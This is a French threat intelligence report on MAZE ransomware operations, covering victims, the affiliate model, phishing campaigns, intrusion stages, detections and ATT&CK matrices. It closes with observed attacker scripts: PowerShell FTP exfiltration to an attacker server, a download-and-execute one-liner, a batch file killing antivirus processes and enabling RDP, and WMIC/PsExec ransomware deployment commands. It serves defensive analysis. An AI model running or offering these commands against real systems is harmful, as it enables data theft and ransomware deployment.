MAZE : le mode opératoire du ransomware

Jeremy Kennelly
May 07, 2020
23 min read
|   DERNIÈRE MISE À JOUR Aug 19, 2022

Dans tous les secteurs et toutes les régions du globe, les attaques ciblées de ransomware font planer le spectre de la perturbation et de la destruction sur les entreprises. FireEye Mandiant Threat Intelligence avait déjà documenté ce phénomène lors d'investigations sur les tendances des ransonmwares, les activités du groupe cybercriminel FIN6, les répercussions sur les réseaux opérationnels (OT), et d'autres aspects liés au déploiement post-compromission de ces malwares. Depuis novembre 2019, nous observons l'utilisation répétée de MAZE dans des opérations combinant trois caractéristiques : usage ciblé du ransomware, divulgation des données des victimes et modèle d'affiliation à un réseau cybercriminel.

Des cybercriminels travaillent cependant à la propagation de MAZE depuis mai 2019 au moins. Pour parvenir à leurs fins, les attaquants ont d'abord recours à des campagnes de spams et des kits d'exploit, avant de procéder au déploiement du malware post-compromission. Les opérations MAZE font intervenir un écosystème d'acteurs variés. C'est du moins ce que suggèrent nos informations recueillies sur des utilisateurs de forums clandestins, ainsi que les modes opératoires observés par les équipes Mandiant de réponse à incident. Particularité de ces hackers, ils alimentent un site web public avec les données des victimes refusant de payer leur rançon.

Parce qu'elles relèvent d'un réseau criminel, mais aussi parce qu'elles compromettent la confidentialité des données et le bon fonctionnement des réseaux, ces attaques représentent une menace grave pour bon nombre d'entreprises. Le présent article s'appuie sur les informations recueillies par les équipes Mandiant de réponse à incident lors de nombreuses interventions, ainsi que sur nos propres recherches sur les opérations et l'écosystème MAZE.

Les équipes Mandiant Threat Intelligence organiseront un webinaire le 21 mai pour répondre à vos questions sur les dangers du ransomware.

Victimologie

Selon les informations relayées par divers médias et le site web MAZE depuis novembre 2019, le ransomware aurait déjà fait plus de 100 victimes. Les organisations touchées se trouvent surtout en Amérique du Nord, même si presque toutes les régions du globe sont concernées. Remarquons enfin la nature indiscriminée de ces opérations puisque l'écrasante majorité des secteurs a été touchée : de l'industrie aux grandes administrations, en passant par le juridique, la finance, la construction, la santé, les technologies et la grande distribution (figure 1).

 


Figure 1 : Répartition par région et secteur des victimes supposées de MAZE

Un écosystème d'acteurs variés

Les équipes Mandiant ont identifié plusieurs acteurs russophones qui déclaraient utiliser MAZE et cherchaient des partenaires pour remplir différentes fonctions au sein de leurs équipes. Au sujet de ces acteurs, les abonnés Mandiant Intelligence ont accès à plus d'informations. A également été relevé la présence d'un portail dédié à la gestion des victimes et aux transactions entre membres affiliés. Ce dernier point corrobore notre hypothèse selon laquelle MAZE n'est pas le fait d'un seul groupe mais obéit plutôt à un modèle d'affiliation. Dans ce scénario, des développeurs conçoivent un ransomware mais laissent à d'autres (les affiliés) le soin de le propager. Les premiers perçoivent ensuite une commission pour chaque rançon payée. De leur côté, les affiliés peuvent à leur tour recruter d'autres acteurs pour la conduite d'actions spécifiques, moyennant là encore un pourcentage du butin. Il s'agira par exemple de partenaires fournissant un accès initial aux entreprises, ou de hackers spécialisés dans la reconnaissance, l'élévation des privilèges et les déplacements latéraux. À noter que, dans certains cas, ces acteurs semblent être rétribués par un salaire (et non une commission) pour réaliser des tâches spécifiques comme déterminer une organisation cible ou calculer son chiffre d'affaires annuel. Ce modèle jette les bases d'un écosystème cybercriminel toujours plus spécialisé, écosystème qui renforce l'efficacité de ses acteurs tout en donnant à chacun sa part du gain.

 


Figure 2 : Portail associé au ransomware MAZE

Vecteurs initiaux de propagation : kits d'exploit et campagnes de spam

La propagation de MAZE s'est d'abord effectuée avec des kits d'exploit et des campagnes de spam vers la fin 2019. C'est ainsi qu'en novembre 2019, les experts Mandiant ont observé plusieurs campagnes d'e-mails ciblant principalement des salariés d'entreprises allemandes et américaines, même si une part significative visait aussi l'Italie, le Canada et la Corée du Sud. Sous l'apparence de messages officiels adressés par une autorité fiscale, un prestataire de service ou un opérateur postal, ces e-mails incluaient des pièces jointes ou des hotlinks chargés de télécharger et d'exécuter le ransomware.

Les 6 et 7 novembre 2019, une campagne MAZE ciblant l'Allemagne diffusait des documents avec macros sous les intitulés "Informations importantes concernant votre crédit d'impôt" et "1&1 Internet AG – Votre facture 19340003422 du 07.11.19" (figure 3). Les destinataires étaient issus de secteurs variés, quoiqu'une majorité relevait des services financiers, de la santé et de l'industrie. Les e-mails en question provenaient quant à eux de domaines malveillants créés avec l'adresse [email protected].

 


Figure 3 : Fraude ciblant des salariés allemands

Le 8 novembre, des entreprises américaines d'assurance et de services financiers faisaient elles aussi les frais d'une campagne MAZE. Envoyés à partir d'un compte compromis ou usurpé, ces e-mails renfermaient un hotlink qui déclenchait le téléchargement d'un exécutable malveillant.

Un peu plus tard, les 18 et 19 novembre, une autre campagne ciblait des individus dans de nombreux secteurs aux États-Unis et au Canada. Les attaquants diffusaient alors des documents avec macros sous l'apparence d'un opérateur téléphonique ou des services postaux (figures 4 et 5). Intitulés "Nous n'avons pas pu livrer votre colis" et "Votre facture mobile AT&T est disponible", ces messages ont été envoyés de domaines malveillants avec l'adresse [email protected]. Fait notable, cette même adresse a aussi servi à la création de domaines italophones vers la fin novembre 2019.

 


Figure 4 : E-mail frauduleux aux couleurs«1» d'AT&T

 


Figure 5 : E-mail frauduleux aux couleurs de Canada Post

Déploiements post-compromission et hausse de l'impact

Au fil du temps, les attaquants MAZE ont mis de plus en plus l'accent sur des déploiements de type post-compromission. Avec cette méthode, les hackers peuvent exfiltrer des données et infecter un plus grand nombre d'hôtes dans l'environnement d'une victime. Levier utile s'il en est pour faire pression et exiger le paiement d'une rançon. Remarquons que, dans certains cas au moins, les attaquants imposent des frais de non-divulgation des données volées en sus des frais traditionnels pour l'obtention de la clé de déchiffrement.

Certes, les intrusions préparatoires au déploiement de MAZE se ressemblent, mais des variations notables suggèrent le concours d'équipes distinctes. Même au sein de ces équipes, il semblerait que chaque hacker se dédie à une série de tâches bien spécifiques. Autrement dit, aucun individu ne porte l'entière responsabilité des opérations. Les sections suivantes mettent en lumière les modes opératoires observés dans une série d'incidents. Elles illustrent des divergences révélatrices de la diversité des acteurs investis aux différentes phases des opérations. Fait intéressant, ces variations concernent aussi le laps de temps séparant la compromission initiale et le cryptage des données, allant de quelques semaines à plusieurs mois.

Compromission initiale

L'analyse des incidents liés à MAZE fait ressortir plusieurs vecteurs d'intrusion récurrents. Ce point étaye notre constat selon lequel divers acteurs utilisent MAZE et sollicitent l'aide de partenaires pour l'accès aux réseaux. Vous trouverez ci-dessous des observations dressées par les équipes Mandiant lors de leurs missions de réponse à incident :

  • Un utilisateur a téléchargé un document malveillant Microsoft Word qui prenait l'apparence d'un CV. Ce document contenait des macros pour le lancement d'une charge active IcedID, laquelle servait ensuite à exécuter une instance de BEACON.
  • Un individu a employé le protocole RDP pour pénétrer dans un système connecté à Internet. Le compte utilisé pour octroyer l'accès initial était un compte de support générique. Nous ignorons encore comment l'individu s'est procuré le mot de passe du compte.
  • Un individu a exploité une erreur de configuration sur un système connecté à Internet. Cet accès lui a permis de déployer des outils pour basculer sur le réseau interne.
  • Un individu a usurpé un compte protégé par un faible mot de passe pour accéder au portail web Citrix. Cette connexion lui a permis de lancer une charge active Meterpreter sur un système interne.

Implantation & maintien de la présence

Pour s'implanter et se maintenir sur un réseau en vue de déployer MAZE, les attaquants semblent privilégier deux approches : l'utilisation d'identifiants légitimes et le déploiement à grande échelle de BEACON sur les environnements cibles. Outre ces méthodes ordinaires, un hacker a également créé son propre compte de domaine en préparation d'opérations ultérieures.

  • Dans plusieurs cas, l'implantation s'est effectuée par l'installation de charges actives BEACON sur de nombreux serveurs et postes de travail dans l'organisation ciblée.
  • Grâce au déploiement de web shells sur un système connecté à Internet, les attaquants ont pu obtenir un accès au niveau du système puis élever leurs privilèges afin d'exécuter un backdoor.
  • De manière régulière, les hackers ont obtenu et maintenu un accès à plusieurs comptes de domaines et systèmes locaux pour s'assurer diverses autorisations et mener à bien leurs opérations.
  • Un individu a créé un nouveau compte de domaine pour l'ajouter au groupe des administrateurs de domaine.

Élévation des privilèges

À plusieurs reprises, les experts Mandiant ont constaté l'emploi de Mimikatz par les attaquants MAZE pour la récupération d'identifiants et l'élévation des privilèges. Plusieurs cas font néanmoins apparaître l'utilisation de Bloodhound et des recherches manuelles de fichiers contenant des identifiants.

  • Moins de deux semaines après l'intrusion initiale, un hacker a téléchargé et manipulé une archive nommée mimi.zip. L'archive contenait des fichiers associés à l'outil de vol d'identifiants Mimikatz. Dans les jours suivants, la même archive mimi.zip a été identifiée sur deux contrôleurs de domaine dans l'environnement touché.
  • L'attaquant y a recherché des fichiers contenant l'expression "mot de passe". De plus, plusieurs fichiers d'archive portaient des intitulés laissant entrevoir une activité de vol d'identifiants.
  • L'individu a tenté d'identifier des hôtes hébergeant le gestionnaire de mots de passe KeePass.
  • L'utilitaire Bloodhound a été employé dans plusieurs incidents, probablement pour déterminer la meilleure façon d'obtenir des identifiants dotés de privilèges administrateur.
  • Les attaquants ont principalement eu recours à Procdump et Mimikatz pour recueillir les identifiants nécessaires à leurs opérations futures. Notons que Bloodhound et PingCastle ont tous deux été utilisés, sans doute pour déceler la configuration Active Directory de l'organisation frappée. Dans ce cas particulier, les auteurs de l'attaque ont aussi tenté d'exfiltrer les identifiants volés vers différentes plateformes de stockage hébergées dans le cloud.

Reconnaissance

Au fil des incidents MAZE observés, les équipes Mandiant ont relevé toute une panoplie d'approches utilisées pour la reconnaissance des réseaux, des hôtes, des données et de la structure Active Directory. Sans doute la variété des méthodes et outils employés est-elle un bon révélateur de la diversité des modes opératoires constatés.

  • Dans certains cas, l'intrus a procédé aux opérations de reconnaissance dans les trois jours suivant la compromission initiale du réseau. L'individu a alors exécuté de nombreux scripts de reconnaissance via Cobalt Strike pour récupérer des informations sur les réseaux, les hôtes, les domaines et les systèmes de fichiers.
  • Plusieurs commandes intégrées Windows ont servi au repérage des réseaux, des comptes et des hôtes de l'environnement ciblé, même si Advanced IP Scanner et Adfind ont aussi été déployés en renfort à ce stade des opérations.
  • Pour la reconnaissance préliminaire du réseau, les attaquants ont utilisé un script de commandes "2.bat" contenant une série d'instructions nslookup. Les informations collectées ont ensuite été copiées sur un fichier nommé "2.txt." 
  • À l'aide d'un script PowerShell encodé, l'intrus a pu exfiltrer des données de reconnaissance et des documents relatifs à l'environnement IT vers un serveur FTP contrôlé par les attaquants.
  • Durant plusieurs jours, un individu a effectué des repérages au moyen de plusieurs outils : Bloodhound, PowerSploit/PowerView (Invoke-ShareFind), et un script de reconnaissance conçu pour énumérer les annuaires des hôtes internes.
  • Un hacker a utilisé un script de commandes en complément de l'outil Adfind pour obtenir des renseignements sur le réseau, les hôtes, les domaines et les utilisateurs. Le résultat du script en question (2adfind.bat) a été sauvegardé dans une archive nommée "ad.7z" grâce à une instance du programme d'archivage 7zip appelée 7.exe
  • Un attaquant a utilisé l'outil smbtools.exe  pour identifier les comptes permettant de se connecter aux systèmes de l'environnement.
  • Un individu a récupéré des listes d'annuaire sur les serveurs de fichiers de l'environnement impacté. Les traces d'une exfiltration de données ont été relevées environ un mois plus tard, ce qui laisse supposer que ces listes auraient pu être créées en amont, et ce dans le but d'obtenir des informations sur les données sensibles à exfiltrer par la suite.

Déplacement latéral

Dans la majorité des incidents MAZE, les attaquants ont réalisé des déplacements latéraux au moyen d'un BEACON Cobalt Strike et d'identifiants volés. Toutefois, d'autres outils et approches ont également pu être observés.

  • Au sein de l'environnement touché, les attaquants ont fait un usage important du BEACON Cobalt Strike pour se déplacer latéralement. Notons également l'utilisation de l'utilitaire ngrok pour la création de tunnels RDP, et celle de tscon pour l'usurpation de sessions RDP légitimes. Cette dernière méthode a permis à la fois des mouvements latéraux et l'élévation des privilèges.
  • Après leur implantation initiale sur un premier système, les attaquants ont réussi à compromettre plusieurs services et comptes utilisateurs, obtenant de fait un accès immédiat à d'autres systèmes. Les identifiants volés ont ensuite permis des déplacements latéraux via RDP sur le réseau, puis l'installation de charges actives BEACON. Les attaquants ont ainsi obtenu l'accès à près d'une centaine d'hôtes.
  • Un individu a exploité Metasploit pour effectuer des déplacements latéraux. Il a ensuite utilisé un compte administrateur local pour déployer une charge active Cobalt Strike sur un système.
  • Au moins un individu a tenté de réaliser des déplacements latéraux avec EternalBlue au début et à la fin de l'année 2019. Rien ne laisse toutefois penser que ces tentatives ont abouti.

Accomplissement de la mission

Dans la majorité des cas, l'analyse des incidents liés à MAZE pointe vers une exfiltration de données. Alors que les pirates ont généralement recours à divers moyens pour monétiser les données volées (vente sur des forums clandestins, fraude...), les attaquants MAZE, eux, sont connus pour rendre ces données publiques en cas de non paiement de la rançon.

  • Nous avons vu un hacker exfiltrer des données vers des serveurs FTP. Pour ce faire, l'individu a utilisé un script PowerShell encodé en base64 et spécialement conçu pour charger tous les fichiers de type ".7z" vers un serveur FTP prédéfini. Il employait alors un nom d'utilisateur et un mot de passe codés en dur. Ce programme semble être une quasi reproduction d'un ancien script publié initialement sur Microsoft TechNet en 2013.
  • Un incident séparé a fait apparaître une autre commande PowerShell encodée en base64 servant la même finalité.
  • Les individus derrière MAZE ont aussi employé l'utilitaire WinSCP pour exfiltrer des données vers un serveur FTP sous leur contrôle.
  • Un hacker s'est servi d'un utilitaire de réplication des fichiers et a transféré les données volées vers une plateforme cloud de stockage/partage des fichiers.
  • Avant le déploiement de MAZE, les agresseurs ont eu recours à l'utilitaire 7zip pour archiver les données de multiples plateformes de partage de fichiers dans l'entreprise. Ensuite, l'utilitaire WinSCP leur a permis d'exfiltrer ces archives via FTP vers un serveur placé sous leur contrôle.

Au-delà du vol de données, les attaquants déploient aussi le ransomware pour crypter des fichiers identifiés sur le réseau de la victime. Notons que le portail MAZE évoqué plus haut comporte une option pour spécifier la date à laquelle le montant de la rançon doublera, sans doute pour créer un sentiment d'urgence chez les victimes.

  • Cinq jours après l'exfiltration des données d'un environnement, un hacker a copié un fichier binaire de MAZE sur 15 hôtes et est parvenu à l'exécuter sur une partie d'entre eux.
  • Grâce à des scripts de commandes et une série de fichiers .txt contenant des noms d'hôtes, des attaquants ont pu déployer et exécuter le ransomware sur de nombreux serveurs et postes de travail dans l'environnement de leur victime.
  • Un individu a déployé MAZE sur des dizaines d'hôtes en utilisant de manière explicite un compte d'administrateur de domaine créé en amont pour se connecter à chaque système.
  • Immédiatement après l'exfiltration des données sensibles, les attaquants ont commencé à déployer le ransomware sur plusieurs hôtes du réseau. Dans certains cas, l'opération a même abouti au cryptage de milliers d'hôtes. Le processus de cryptage se déroulait comme suit :
    • Un script de commandes nommé start.bat servait à exécuter une série de scripts de commandes secondaires avec des noms comme xaa3x.bat ou xab3x.bat.
    • Chacun de ces scripts contenait des instructions qui utilisaient la commande de copie, WMIC et PsExec pour copier et exécuter un script d'arrêt (windows.bat) et une instance de MAZE (sss.exe) sur les hôtes de l'environnement impacté.
    • Fait notable, les analyses forensiques de l'environnement ont révélé que les hôtes cryptés ne représentaient que 10 % du nombre total d'hôtes visés par les scripts de déploiement MAZE.

Répercussions

Nous soutenons l'hypothèse selon laquelle différents acteurs utilisent le ransomware MAZE. C'est pourquoi nous pensons que les variantes des modes opératoires observés sont appelées à perdurer et que de nouvelles variantes apparaîtront, notamment concernant le vecteur initial d'intrusion. Pour des recommandations plus complètes en matière de protection, consultez notre article de blog Stratégies de protection et de confinement des ransomwares et le livre blanc qui l'accompagne.

Actions de validation de la sécurité selon Mandiant

Avec plus de 20 actions spécifiques à MAZE, le service Mandiant Security Validation guide les entreprises dans la vérification de leurs contrôles de sécurité. Pour plus d'informations, référez-vous aux mises à jour de contenu apportées le 21 avril 2020 sur le portail client Mandiant Security Validation (section "Headline Release Content Updates – April 21, 2020").

  • A100-877 - Active Directory - BloodHound, CollectionMethod All
  • A150-006 - Command and Control - BEACON, Check-in
  • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
  • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
  • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
  • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
  • A100-887 - Command and Control - MAZE, DNS Query #1
  • A100-888 - Command and Control - MAZE, DNS Query #2
  • A100-889 - Command and Control - MAZE, DNS Query #3
  • A100-890 -  Command and Control - MAZE, DNS Query #4
  • A100-891 - Command and Control - MAZE, DNS Query #5
  • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
  • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
  • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
  • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
  • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
  • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
  • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
  • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
  • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
  • A104-052 - Host CLI - Credential Access: Mimikatz
  • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
  • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
  • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
  • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
  • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
  • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
  • A104-493 - Host CLI - Discovery: Enumerate Network Shares
  • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
  • A104-482 - Host CLI - Discovery: Language Query Using reg query
  • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
  • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
  • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
  • A104-027 - Host CLI - Discovery: Process Discovery
  • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
  • A104-029 - Host CLI - Discovery: Remote System Discovery
  • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
  • A104-083 - Host CLI - Discovery: System Info
  • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
  • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
  • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
  • A100-879 - Malicious File Transfer - Adfind.exe, Download
  • A150-046 - Malicious File Transfer - BEACON, Download
  • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
  • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
  • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
  • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
  • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
  • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
  • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
  • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
  • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
  • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
  • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
  • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
  • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
  • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
  • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
  • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
  • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
  • A100-886 - Malicious File Transfer - Rclone.exe, Download
  • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

Détection des techniques

Plateforme

Nom de signature

MVX (englobe plusieurs technologies FireEye)

Bale Detection

FE_Ransomware_Win_MAZE_1

Endpoint Security

WMIC SHADOWCOPY DELETE (METHODOLOGY)

MAZE RANSOMWARE (FAMILY)

Network Security

Ransomware.Win.MAZE

Ransomware.Maze

Ransomware.Maze

Matrice MITRE ATT&CK

À l'heure actuelle, les experts Mandiant surveillent trois clusters d'activité impliqués dans des déploiements de MAZE post-compromission. À terme, la collecte et l'analyse de données devraient nous permettre non seulement d'identifier de nouveaux groupes impliqués dans la propagation de MAZE, mais aussi de relier certains groupes à des clusters plus vastes. Notez enfin que les techniques de la phase "accès initial" ont été inclues dans cette matrice bien que l'accès ait pu, dans certains cas, être fourni par un ou plusieurs hackers tiers.

Matrice MITRE ATT&CK : groupe MAZE n° 1

Catégorie de tactique ATT&CK

Techniques

Accès initial

T1133 : Services distants externes

T1078 : Comptes valides

Exécution

T1059 : Interface de ligne de commande

T1086 : PowerShell

T1064 : Scripts

T1035 : Exécution de service

Persistance

T1078 : Comptes valides

T1050 : Nouveau service

Élévation de privilèges

T1078 : Comptes valides

Contournement des défenses

T1078 : Comptes valides

T1036 : Usurpation / Camouflage

T1027 : Fichiers ou données dissimulés

T1064 : Scripts

Accès aux identifiants

T1110 : Force brute

T1003 : Dumping d’identifiants

Détection

T1087 : Découverte de comptes

T1482 : Découverte de relations de confiance entre domaines

T1083 : Découverte de fichiers et répertoires

T1135 : Découverte de réseau partagé

T1069 : Découverte de groupes d’autorisations

T1018 : Découverte de systèmes distants

T1016 : Découverte de configurations réseau et système

Déplacement latéral

T1076 : Protocole RDP

T1105 : Copie de fichiers à distance

Collecte

T1005 : Données des systèmes locaux

Commande et contrôle

T1043 : Port couramment utilisé

T1105 : Copie de fichiers à distance

T1071 : Protocole standard de la couche applicative

Exfiltration

T1002 : Compression de données

T1048 : Exfiltration par un protocole alternatif

Recherche d’impact

T1486 : Chiffrement de données à impact

T1489 : Interruption de service

Matrice MITRE ATT&CK : groupe MAZE n° 2

Catégorie de tactique ATT&CK

Techniques

Accès initial

T1193 : Pièce jointe d’e-mail de spear-phishing

Exécution

T1059 : Interface de ligne de commande

T1086 : PowerShell

T1085 : Rundll32

T1064 : Scripts

T1204 : Exécution via utilisateur

T1028 : Windows Remote Management

Persistance

T1078 : Comptes valides

T1050 : Nouveau service

T1136 : Création de comptes

Élévation de privilèges

T1078 : Comptes valides

T1050 : Nouveau service

Contournement des défenses

T1078 : Comptes valides

T1140 : Exposition / Décodage de fichiers ou informations

T1107 : Suppression de fichiers

T1036 : Usurpation / Camouflage

Accès aux identifiants

T1003 : Dumping d’identifiants

T1081 : Identifiants dans fichiers

T1171 : Empoisonnement LLMNR/NBT-NS

Détection

T1087 : Découverte de comptes

T1482 : Découverte de relations de confiance entre domaines

T1083 : Découverte de fichiers et répertoires

T1135 : Découverte de réseau partagé

T1069 : Découverte de groupes d’autorisations

T1018 : Découverte de systèmes distants

T1033 : Découverte d’utilisateurs/propriétaires système

Déplacement latéral

T1076 : Protocole RDP

T1028 : Windows Remote Management

Collecte

T1074 : Staging des données

T1005 : Données des systèmes locaux

T1039 : Données de disques en réseau

Commande et contrôle

T1043 : Port couramment utilisé

T1219 : Outils d’accès à distance

T1105 : Copie de fichiers à distance

T1071 : Protocole standard de la couche applicative

T1032 : Protocole cryptographique standard

Exfiltration

T1020 : Exfiltration automatique

T1002 : Compression de données

T1048 : Exfiltration par un protocole alternatif

Recherche d’impact

T1486 : Chiffrement de données à impact

Matrice MITRE ATT&CK : groupe MAZE n° 3 (FIN6)

Catégorie de tactique ATT&CK

Techniques

Accès initial

T1133 : Services distants externes

T1078 : Comptes valides

Exécution

T1059 : Interface de ligne de commande

T1086 : PowerShell

T1064 : Scripts

T1035 : Exécution de service

Persistance

T1078 : Comptes valides

T1031 : Modification d’un service existant

Élévation de privilèges

T1055 : Injection de code dans un processus

T1078 : Comptes valides

Contournement des défenses

T1055 : Injection de code dans un processus

T1078 : Comptes valides

T1116 : Signature de code

T1089 : Désactivation des outils de sécurité

T1202 : Exécution de commande indirecte

T1112 : Modification de registre

T1027 : Fichiers ou données dissimulés

T1108 : Accès redondant

T1064 : Scripts

Accès aux identifiants

T1003 : Dumping d’identifiants

Détection

T1087 : Découverte de comptes

T1482 : Découverte de relations de confiance entre domaines

T1083 : Découverte de fichiers et répertoires

T1069 : Découverte de groupes d’autorisations

T1018 : Découverte de systèmes distants

Déplacement latéral

T1097 : Pass the Ticket

T1076 : Protocole RDP

T1105 : Copie de fichiers à distance

T1077 : Partages administratifs Windows

Collecte

T1074 : Staging des données

T1039 : Données de disques en réseau

Commande et contrôle

T1043 : Port couramment utilisé

T1219 : Outils d’accès à distance

T1105 : Copie de fichiers à distance

T1071 : Protocole standard de la couche applicative

T1032 : Protocole cryptographique standard

Exfiltration

T1002 : Compression de données

Recherche d’impact

T1486 : Chiffrement de données à impact

T1490 : Blocage du rétablissement des systèmes

T1489 : Interruption de service

Exemple de commandes observées dans des incidents de ransomware MAZE

function Enum-UsersFolders($PathEnum)
{
    $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

    Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

    foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

        foreach($SeachDir in $foldersArr) {
            Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
        }
    }
}

Script de reconnaissance PowerShell utilisé pour l'énumération des répertoires

$Dir="C:/Windows/Temp/"
#ftp server
$ftp = "ftp://<IP Address>/incoming/"
$user = "<username>"
$pass = "<password>"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
#list every sql server trace file
foreach($item in (dir $Dir "*.7z")){
   "Uploading $item..."
   $uri = New-Object System.Uri($ftp+$item.Name)
   $webclient.UploadFile($uri, $item.FullName)
}

Script PowerShell décodé de chargement via FTP

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

Script PowerShell décodé de chargement via FTP

[…]
echo 7
echo 7
taskkill /im csrss_tc.exe /f
taskkill /im kwsprod.exe /f
taskkill /im avkwctl.exe /f
taskkill /im rnav.exe /f
taskkill /im crssvc.exe /f
sc config CSAuth start= disabled
taskkill /im vsserv.exe /f
taskkill /im ppmcativedetection.exe /f
[…]
taskkill /im sahookmain.exe /f
taskkill /im mcinfo.exe /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
c:\windows\temp\sss.exe

Extrait du script d'arrêt windows.bat

start copy sss.exe \\<internal IP>\c$\windows\temp\
start copy sss.exe \\<internal IP>\c$\windows\temp\

start copy windows.bat \\<internal IP>\c$\windows\temp\
start copy windows.bat \\<internal IP>\c$\windows\temp\

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

Exemple de commandes issues des scripts de déploiement MAZE

@echo off
del done.txt
del offline.txt
rem Loop thru list of computer names in file specified on command-line
for /f %%i in (%1) do call :check_machine %%i
goto end
:check_machine
rem Check to see if machine is up.
ping -n 1 %1|Find "TTL=" >NUL 2>NUL
if errorlevel 1 goto down
echo %1
START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
timeout 1 > NUL
echo %1 >> done.txt
rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
